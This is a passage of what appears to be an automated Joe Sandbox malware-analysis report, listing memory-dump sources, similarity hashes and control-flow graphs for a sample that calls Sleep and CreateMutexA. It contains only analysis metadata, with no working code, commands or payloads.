                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754724910.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754747383.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754822300.0000000000AC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754839458.0000000000AC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754862757.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754884931.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754903119.0000000000ADC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754920171.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754939311.0000000000AE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754960813.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754982004.0000000000AF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                          • Opcode ID: ad943ee72341b45c7119e7f48fae38e52ac11d73233cda7104cfd84d981441d6
                                                                                                                                                                                                                                          • Instruction ID: a0fce63c97a30117ee269f8d37a829e7e18123f4b56d7b104a63b1634dd8a838
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad943ee72341b45c7119e7f48fae38e52ac11d73233cda7104cfd84d981441d6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF319B32605184EBEB189BBDDC887ACB7B2EBC9310F204618E114DB3D2E77D69818712

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 241 7ea079-7ea099 245 7ea09b-7ea0a7 241->245 246 7ea0c7-7ea0e3 241->246 247 7ea0bd-7ea0c4 call 7fd663 245->247 248 7ea0a9-7ea0b7 245->248 249 7ea0e5-7ea0f1 246->249 250 7ea111-7ea130 246->250 247->246 248->247 251 7ea930-7ea994 call 816c6a Sleep CreateMutexA 248->251 253 7ea107-7ea10e call 7fd663 249->253 254 7ea0f3-7ea101 249->254 255 7ea15e-7ea916 call 7f80c0 250->255 256 7ea132-7ea13e 250->256 271 7ea996-7ea998 251->271 272 7ea9a7-7ea9a8 251->272 253->250 254->251 254->253 261 7ea154-7ea15b call 7fd663 256->261 262 7ea140-7ea14e 256->262 261->255 262->251 262->261 271->272 273 7ea99a-7ea9a5 271->273 273->272
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 007EA963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,00843254), ref: 007EA981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1753888094.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753867143.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753888094.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753959790.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753979506.000000000084B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754003634.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754024988.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754045323.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754169501.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754191423.00000000009AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754216353.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754240291.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754304972.00000000009DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754326607.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754353144.00000000009EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754373289.00000000009EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754410709.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754428649.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754446572.0000000000A0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754466339.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754483518.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754504199.0000000000A19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754525628.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754543705.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754561613.0000000000A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754578626.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754600607.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754617658.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754636624.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754654088.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754671678.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754689049.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754707261.0000000000A6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754724910.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754747383.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754822300.0000000000AC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754839458.0000000000AC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754862757.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754884931.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754903119.0000000000ADC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754920171.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754939311.0000000000AE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754960813.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754982004.0000000000AF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                          • Opcode ID: 25b58b879a75fcd4f1cd1ac74d40c51661d97414a26703f5ae26f7e259554dd9
                                                                                                                                                                                                                                          • Instruction ID: 66a4403b2fac4cba4f77147978b75496abb5fd8b90ef883c2634c6de50a39b00
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25b58b879a75fcd4f1cd1ac74d40c51661d97414a26703f5ae26f7e259554dd9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8314831605284EBEB189BBDCD8876CB772EBC9314F204218E014DB3D6E77D79808612

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 275 7ea1ae-7ea1ce 279 7ea1fc-7ea218 275->279 280 7ea1d0-7ea1dc 275->280 281 7ea21a-7ea226 279->281 282 7ea246-7ea265 279->282 283 7ea1de-7ea1ec 280->283 284 7ea1f2-7ea1f9 call 7fd663 280->284 286 7ea23c-7ea243 call 7fd663 281->286 287 7ea228-7ea236 281->287 288 7ea267-7ea273 282->288 289 7ea293-7ea916 call 7f80c0 282->289 283->284 290 7ea935 283->290 284->279 286->282 287->286 287->290 295 7ea289-7ea290 call 7fd663 288->295 296 7ea275-7ea283 288->296 292 7ea953-7ea994 Sleep CreateMutexA 290->292 293 7ea935 call 816c6a 290->293 305 7ea996-7ea998 292->305 306 7ea9a7-7ea9a8 292->306 293->292 295->289 296->290 296->295 305->306 307 7ea99a-7ea9a5 305->307 307->306
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 007EA963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,00843254), ref: 007EA981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1753888094.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753867143.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753888094.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753959790.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753979506.000000000084B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754003634.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754024988.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754045323.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754169501.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754191423.00000000009AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754216353.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754240291.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754304972.00000000009DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754326607.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754353144.00000000009EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754373289.00000000009EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754410709.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754428649.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754446572.0000000000A0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754466339.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754483518.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754504199.0000000000A19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754525628.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754543705.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754561613.0000000000A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754578626.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754600607.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754617658.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754636624.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754654088.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754671678.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754689049.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754707261.0000000000A6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754724910.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754747383.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754822300.0000000000AC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754839458.0000000000AC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754862757.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754884931.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754903119.0000000000ADC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754920171.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754939311.0000000000AE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754960813.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754982004.0000000000AF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                          • Opcode ID: 5f712d7543fc4bd5d761f0561fbdfe85c19ce014df507e3a3d6cd3c3c5f57574
                                                                                                                                                                                                                                          • Instruction ID: f62e532667be5fd04fa257bd85f021f52af67210494634f26be0e26071ffd53f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f712d7543fc4bd5d761f0561fbdfe85c19ce014df507e3a3d6cd3c3c5f57574
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB313731A05184EBEB189BADDD8876CB772EBCA310F204218E114EB3D2E77D79808612

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 309 7ea418-7ea438 313 7ea43a-7ea446 309->313 314 7ea466-7ea482 309->314 317 7ea45c-7ea463 call 7fd663 313->317 318 7ea448-7ea456 313->318 315 7ea484-7ea490 314->315 316 7ea4b0-7ea4cf 314->316 320 7ea4a6-7ea4ad call 7fd663 315->320 321 7ea492-7ea4a0 315->321 322 7ea4fd-7ea916 call 7f80c0 316->322 323 7ea4d1-7ea4dd 316->323 317->314 318->317 324 7ea93f-7ea949 call 816c6a * 2 318->324 320->316 321->320 321->324 328 7ea4df-7ea4ed 323->328 329 7ea4f3-7ea4fa call 7fd663 323->329 340 7ea94e 324->340 341 7ea949 call 816c6a 324->341 328->324 328->329 329->322 342 7ea953-7ea994 Sleep CreateMutexA 340->342 343 7ea94e call 816c6a 340->343 341->340 345 7ea996-7ea998 342->345 346 7ea9a7-7ea9a8 342->346 343->342 345->346 347 7ea99a-7ea9a5 345->347 347->346
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 007EA963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,00843254), ref: 007EA981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1753888094.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753867143.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753888094.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753959790.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753979506.000000000084B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754003634.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754024988.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754045323.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754169501.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754191423.00000000009AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754216353.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754240291.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754304972.00000000009DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754326607.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754353144.00000000009EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754373289.00000000009EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754410709.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754428649.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754446572.0000000000A0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754466339.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754483518.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754504199.0000000000A19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754525628.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754543705.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754561613.0000000000A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754578626.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754600607.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754617658.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754636624.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754654088.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754671678.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754689049.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754707261.0000000000A6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754724910.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754747383.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754822300.0000000000AC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754839458.0000000000AC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754862757.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754884931.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754903119.0000000000ADC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754920171.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754939311.0000000000AE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754960813.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754982004.0000000000AF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                          • Opcode ID: 4ed3a29ea4ed88a3d260e052982ee980a3c5f167e46d05a9314297cfc84310c9
                                                                                                                                                                                                                                          • Instruction ID: 2f491c57e1811001b5fd609ed73808f08c7aed70739f06b0294e3f7a264cfbf8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ed3a29ea4ed88a3d260e052982ee980a3c5f167e46d05a9314297cfc84310c9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD316E31605180E7EB18ABBDDD8976DB772EFCA314F204218E054D73D6E7BD79808652

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 349 7ea54d-7ea56d 353 7ea56f-7ea57b 349->353 354 7ea59b-7ea5b7 349->354 355 7ea57d-7ea58b 353->355 356 7ea591-7ea598 call 7fd663 353->356 357 7ea5b9-7ea5c5 354->357 358 7ea5e5-7ea604 354->358 355->356 361 7ea944-7ea949 call 816c6a 355->361 356->354 363 7ea5db-7ea5e2 call 7fd663 357->363 364 7ea5c7-7ea5d5 357->364 359 7ea606-7ea612 358->359 360 7ea632-7ea916 call 7f80c0 358->360 365 7ea628-7ea62f call 7fd663 359->365 366 7ea614-7ea622 359->366 376 7ea94e 361->376 377 7ea949 call 816c6a 361->377 363->358 364->361 364->363 365->360 366->361 366->365 379 7ea953-7ea994 Sleep CreateMutexA 376->379 380 7ea94e call 816c6a 376->380 377->376 383 7ea996-7ea998 379->383 384 7ea9a7-7ea9a8 379->384 380->379 383->384 385 7ea99a-7ea9a5 383->385 385->384
